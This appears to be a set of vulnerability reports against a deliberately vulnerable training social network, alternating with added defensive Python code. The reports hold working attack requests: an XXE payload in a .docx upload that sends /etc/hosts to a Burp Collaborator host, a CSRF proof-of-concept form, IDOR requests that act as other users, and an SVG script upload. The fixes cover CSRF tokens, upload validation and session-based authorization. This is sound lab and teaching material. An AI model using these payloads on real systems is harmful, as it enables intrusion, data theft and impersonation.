softwaresecured / facebroke
A deliberately vulnerable social network
License: GNU General Public License v3.0
Steps to reproduce:
I was able to upload docx, svg, xml, html, jsp, etc.
Attack Request:
POST /image HTTP/1.1
Host: 192.168.99.100:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------264311999222285
Content-Length: 827
Referer: https://192.168.99.100:8443/settings?id=1002
Cookie: JSESSIONID=D997F0ADEA6C0E4E5445D957349C22F0
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------264311999222285
Content-Disposition: form-data; name="creator_id"

1002
-----------------------------264311999222285
Content-Disposition: form-data; name="owner_id"

1002
-----------------------------264311999222285
Content-Disposition: form-data; name="label"

Profile Picture
-----------------------------264311999222285
Content-Disposition: form-data; name="context"

profile
-----------------------------264311999222285
Content-Disposition: form-data; name="file"; filename="evil-xxe.docx"
Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document

<!ENTITY % data SYSTEM "file:///etc/hosts"><!ENTITY % param1 "<!ENTITY exfil SYSTEM 'yy08gndcee5xrh6ws928gj4qlhr7fw.burpcollaborator.net?%data;'>">
-----------------------------264311999222285--
Attack Response:
HTTP/1.1 302
Location: settings?id=1002
Content-Length: 0
Date: Thu, 26 Oct 2017 15:49:25 GMT
Connection: close
The application is vulnerable to CSRF attacks on all POST requests.
Steps to reproduce:
PoC:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://192.168.99.100:8443/wall?user_id=1002" method="POST">
<input type="hidden" name="on_wall" value="1" />
<input type="hidden" name="creator_id" value="682" />
<input type="hidden" name="type" value="TEXT" />
<input type="hidden" name="content" value="CSRFed not myself" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Attack Request:
POST /wall?user_id=1002 HTTP/1.1
Host: 192.168.99.100:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Referer: http://burp/
Cookie: JSESSIONID=5FE72AC60AACB875AD93B6F63C87A69A
Connection: close
Upgrade-Insecure-Requests: 1

on_wall=1&creator_id=682&type=TEXT&content=CSRFed+not+myself
Attack Response:
HTTP/1.1 302
Location: wall?user_id=1002
Content-Length: 0
Date: Thu, 26 Oct 2017 17:14:34 GMT
Connection: close
All the POST requests look vulnerable to a similar attack, as there are no CSRF tokens being used.
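A server-side check that would have refused the cross-site submission above, added here as an illustration; it is not taken from the facebroke code base, which this page does not show. It assumes a form-encoded body, a session id taken from the JSESSIONID cookie, and an application origin of https://192.168.99.100:8443 as in the report's Host header. `issue_token`, `check_csrf`, `same_site_request`, `CROSS_SITE` and `SERVER_SECRET` are names chosen for this example, and the two sample requests are constructed from the report's traffic:

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# The application's origin, as in the report's Host header.
APP_ORIGIN = "https://192.168.99.100:8443"

# Constructed: a per-deployment secret from which per-session tokens derive.
SERVER_SECRET = secrets.token_bytes(32)

STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}


def issue_token(session_id: str) -> str:
    """Synchronizer token for a session, HMAC-bound to the session id so it
    needs no server-side storage; the server puts it in every form as
    <input type="hidden" name="csrf_token" value="...">."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def _source_origin(headers: Dict[str, str]) -> Optional[str]:
    """scheme://host[:port] of the page that sent the request, from Origin
    or, failing that, Referer; None when neither header is present."""
    lowered = {k.lower(): v for k, v in headers.items()}
    raw = lowered.get("origin") or lowered.get("referer")
    if not raw:
        return None
    parts = urlsplit(raw)
    return f"{parts.scheme}://{parts.netloc}"


def check_csrf(method: str, headers: Dict[str, str], body: str,
               session_id: str) -> Tuple[bool, str]:
    """Gate a request: safe methods pass; state-changing ones must come from
    this origin AND carry the session's token.  The two checks are
    independent, so a leaked token still fails from a foreign page and a
    spoofed header still fails without the token."""
    if method.upper() not in STATE_CHANGING:
        return True, "safe method"
    origin = _source_origin(headers)
    if origin is None:
        return False, "no Origin or Referer on a state-changing request"
    if origin != APP_ORIGIN:
        return False, f"cross-origin request from {origin}"
    form = parse_qs(body, keep_blank_values=True)
    token = form.get("csrf_token", [""])[0]
    if not hmac.compare_digest(token.encode(), issue_token(session_id).encode()):
        return False, "missing or invalid csrf_token"
    return True, "ok"


# Constructed replay of the report's cross-site request: the attacker's page
# submits the form, so the browser attaches the victim's cookie but sends a
# foreign Referer and no token.
CROSS_SITE = {
    "method": "POST",
    "headers": {"Referer": "http://burp/",
                "Cookie": "JSESSIONID=5FE72AC60AACB875AD93B6F63C87A69A"},
    "body": "on_wall=1&creator_id=682&type=TEXT&content=CSRFed+not+myself",
    "session_id": "5FE72AC60AACB875AD93B6F63C87A69A",
}


def same_site_request(session_id: str) -> dict:
    """Constructed: the same wall post as submitted by the app's own form."""
    return {
        "method": "POST",
        "headers": {"Origin": APP_ORIGIN,
                    "Referer": f"{APP_ORIGIN}/wall?user_id=1002"},
        "body": "on_wall=1&type=TEXT&content=hello&csrf_token="
                + issue_token(session_id),
        "session_id": session_id,
    }


if __name__ == "__main__":
    print(check_csrf(**CROSS_SITE))
    print(check_csrf(**same_site_request(CROSS_SITE["session_id"])))
```

The token is the primary control: it is bound to the session, the attacker's page cannot read it, and a request without it is refused even when the origin check passes. The origin check is defence in depth; because browsers may omit Referer, refusing state-changing requests that carry neither Origin nor Referer is the conservative choice. Setting SameSite=Lax on the JSESSIONID cookie stops the cookie from being attached to cross-site form posts in current browsers as well.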
Steps to Reproduce:
Note: creator_id=682 is the Adam Perez user and user_id=1002 is myself.
Attack Request:
POST /wall?user_id=1002 HTTP/1.1
Host: 192.168.99.100:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Referer: https://192.168.99.100:8443/index
Cookie: JSESSIONID=5FE72AC60AACB875AD93B6F63C87A69A
Connection: close
Upgrade-Insecure-Requests: 1

on_wall=1&creator_id=682&type=TEXT&content=not myself
Attack Response:
HTTP/1.1 302
Location: wall?user_id=1002
Content-Length: 0
Date: Thu, 26 Oct 2017 17:10:57 GMT
Connection: close
Steps to reproduce:
Attack Request:
POST /settings?id=486 HTTP/1.1
Host: 192.168.99.100:8443
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://192.168.99.100:8443/settings?id=1002
Content-Type: application/x-www-form-urlencoded
Content-Length: 154
Cookie: JSESSIONID=CB39DD1389BDE85C38D86EDE670B1363

regLastName=Test&regPassword=&regDOB=1995-09-01&[email protected]&regUsername=otest&regFirstName=Olivia&target_id=486&regPasswordConfirm=
Attack Response:
HTTP/1.1 302
Location: settings?id=486
Content-Length: 0
Date: Thu, 26 Oct 2017 14:01:09 GMT
Connection: close
Steps to reproduce:
Attack Request:
POST /image HTTP/1.1
Host: 192.168.99.100:8443
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://192.168.99.100:8443/settings?id=1002
Content-Type: multipart/form-data; boundary=--------207487880
Content-Length: 884
Cookie: JSESSIONID=CB39DD1389BDE85C38D86EDE670B1363

----------207487880
Content-Disposition: form-data; name="file"; filename="image.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert('This app is probably vulnerable to XSS attacks!');
</script>
</svg>
----------207487880
Content-Disposition: form-data; name="owner_id"

486
----------207487880
Content-Disposition: form-data; name="creator_id"

486
----------207487880
Content-Disposition: form-data; name="context"

profile
----------207487880
Content-Disposition: form-data; name="label"

Test Picture
----------207487880--
Attack Response:
HTTP/1.1 302
Location: settings?id=486
Content-Length: 0
Date: Thu, 26 Oct 2017 13:49:46 GMT
Connection: close
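Server-side upload validation covering both upload findings on this page: the evil-xxe.docx request earlier and the SVG with an embedded script just above. This is an added example, not the project's code. It assumes the profile-picture endpoint only needs raster images, so it allowlists png/jpeg/gif and checks each file's leading bytes instead of trusting the extension or Content-Type. `xml_findings` is a separate helper for any XML the application does decide to parse; it uses the standard-library expat parser's declaration handlers to flag DOCTYPE, entity declarations and script elements without resolving anything. The sample inputs are constructed copies of the report's payloads (the XXE declaration trimmed to its first entity) plus a stub PNG header; `validate_upload`, `xml_findings`, `ALLOWED_TYPES` and `MAGIC` are names chosen here:

```python
import xml.parsers.expat as expat
from typing import List, Tuple

# Allowlist for the profile-picture endpoint: extension -> the only
# Content-Type accepted alongside it.  SVG and docx are deliberately absent.
ALLOWED_TYPES = {"png": "image/png", "jpg": "image/jpeg",
                 "jpeg": "image/jpeg", "gif": "image/gif"}

# File signatures each accepted type must begin with; the bytes are checked
# because the filename and Content-Type are attacker-controlled.
MAGIC = {
    "image/png": (b"\x89PNG\r\n\x1a\n",),
    "image/jpeg": (b"\xff\xd8\xff",),
    "image/gif": (b"GIF87a", b"GIF89a"),
}


def validate_upload(filename: str, declared_type: str, data: bytes) -> Tuple[bool, str]:
    """Accept a file only when extension, declared type and leading bytes agree."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    expected = ALLOWED_TYPES.get(ext)
    if expected is None:
        return False, f"extension '.{ext}' is not an allowed image type"
    if declared_type.split(";", 1)[0].strip().lower() != expected:
        return False, f"declared type {declared_type!r} does not match .{ext}"
    if not data.startswith(MAGIC[expected]):
        return False, f"content does not start with the {expected} signature"
    return True, expected


def xml_findings(data: bytes) -> List[str]:
    """Flag DOCTYPE declarations, entity declarations and <script> elements
    in XML without resolving anything.  The standard-library expat parser
    reports each construct to a handler as it tokenises, and because no
    ExternalEntityRefHandler is installed it never fetches a SYSTEM id."""
    findings: List[str] = []
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        findings.append(f"doctype:{name}")

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        kind = "parameter-entity:" if is_param else "entity:"
        findings.append(kind + name + (f" SYSTEM {sysid}" if sysid else ""))

    def on_start(name, attrs):
        # Strip any namespace prefix so svg:script is caught too.
        if name.rsplit(":", 1)[-1].lower() == "script":
            findings.append("script-element")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.StartElementHandler = on_start
    try:
        parser.Parse(data, True)
    except expat.ExpatError as err:
        findings.append(f"malformed:{err}")
    return findings


# Constructed samples.  The first two copy the report's payloads (the XXE
# declaration trimmed to its first entity); the third wraps that entity in
# the DOCTYPE it would need inside one of the .docx's XML parts; the fourth
# is a stub PNG header standing in for a real picture.
XXE_FRAGMENT = b'<!ENTITY % data SYSTEM "file:///etc/hosts">'
SVG_PAYLOAD = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert('This app is probably vulnerable to XSS attacks!');
</script>
</svg>"""
XXE_DOC = b'<?xml version="1.0"?><!DOCTYPE doc [' + XXE_FRAGMENT + b']><doc/>'
PNG_STUB = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
DOCX_TYPE = "application/vnd.openxmlformats-officedocument.wordprocessingml.document"

if __name__ == "__main__":
    print(validate_upload("evil-xxe.docx", DOCX_TYPE, XXE_FRAGMENT))
    print(validate_upload("image.svg", "image/svg+xml", SVG_PAYLOAD))
    print(validate_upload("image.png", "image/png", SVG_PAYLOAD))  # renamed SVG still fails
    print(validate_upload("avatar.png", "image/png", PNG_STUB))
    print(xml_findings(SVG_PAYLOAD))
    print(xml_findings(XXE_DOC))
```

Store accepted files under a server-generated name, and serve them with X-Content-Type-Options: nosniff and a Content-Type taken from the verified signature, so a file that passes the check cannot later be reinterpreted by the browser as markup.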
Steps to reproduce:
Here are the request and response showing posting a comment as another user. For reference, my user has an id of 1002.
Attack Request:
POST /comment HTTP/1.1
Host: 192.168.99.100:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Referer: https://192.168.99.100:8443/wall?user_id=1002
Cookie: JSESSIONID=CB39DD1389BDE85C38D86EDE670B1363
Connection: close
Upgrade-Insecure-Requests: 1

on_wall=1&creator_id=486&post_id=2892&content=Sandra Comment
Attack Response:
HTTP/1.1 302
Location: wall?user_id=1002#2892
Content-Length: 0
Date: Thu, 26 Oct 2017 13:45:32 GMT
Connection: close
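The three reports that set creator_id or target_id to another user (the wall post as creator 682, the settings change to id 486, and the comment above posted as user 486) share one root cause: the server accepts the identity named in the request. The check below is an added illustration rather than facebroke's code. It takes the acting user from the session only and treats any disagreeing identity field as both a denial and an audit event. The session table and the endpoint-to-field map are constructed for this example (both JSESSIONID values from the reports are mapped to the reporter's user, 1002, as the reports state), and `authorize`, `SESSIONS` and `IDENTITY_FIELDS` are names chosen here:

```python
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Constructed session store (cookie value -> authenticated user id).  Both
# JSESSIONID values in the reports belong to the reporter's user, id 1002.
SESSIONS: Dict[str, int] = {
    "CB39DD1389BDE85C38D86EDE670B1363": 1002,
    "5FE72AC60AACB875AD93B6F63C87A69A": 1002,
}

# Per endpoint, the request fields that name who is acting or whose account
# is changed.  user_id on /wall and post_id on /comment are resources, not
# identities, so they are not listed: posting on someone else's wall is fine.
IDENTITY_FIELDS: Dict[str, List[str]] = {
    "/wall": ["creator_id"],
    "/comment": ["creator_id"],
    "/settings": ["id", "target_id"],
}


def _params(url: str, body: str) -> Dict[str, str]:
    """Merge query-string and form-body fields; the first occurrence wins."""
    merged: Dict[str, str] = {}
    for source in (urlsplit(url).query, body):
        for key, values in parse_qs(source, keep_blank_values=True).items():
            merged.setdefault(key, values[0])
    return merged


def authorize(session_id: Optional[str], url: str, body: str
              ) -> Tuple[bool, Optional[int], List[str]]:
    """Return (allowed, acting_user, audit_notes).

    The acting user is whoever the session says; nothing in the request can
    override that.  Each identity field the client did send is compared to
    it, and a mismatch both denies the request and yields a note worth
    logging: the application's own forms never produce one, so it is a
    reliable tampering signal.
    """
    user = SESSIONS.get(session_id or "")
    if user is None:
        return False, None, ["no authenticated session"]
    path = urlsplit(url).path
    params = _params(url, body)
    notes = [
        f"{path}: client sent {field}={params[field]} but session user is {user}"
        for field in IDENTITY_FIELDS.get(path, [])
        if field in params and params[field] != str(user)
    ]
    return (not notes), user, notes


if __name__ == "__main__":
    # The three tampered requests from the reports, replayed against the check.
    print(authorize("5FE72AC60AACB875AD93B6F63C87A69A", "/wall?user_id=1002",
                    "on_wall=1&creator_id=682&type=TEXT&content=not myself"))
    print(authorize("CB39DD1389BDE85C38D86EDE670B1363", "/settings?id=486",
                    "regLastName=Test&regPassword=&target_id=486&regPasswordConfirm="))
    print(authorize("CB39DD1389BDE85C38D86EDE670B1363", "/comment",
                    "on_wall=1&creator_id=486&post_id=2892&content=Sandra Comment"))
```

The cleanest fix is to drop creator_id from the forms altogether and have the handler stamp the session user on the record; keeping the comparison in place while the field still exists gives a detection signal for clients that edit it.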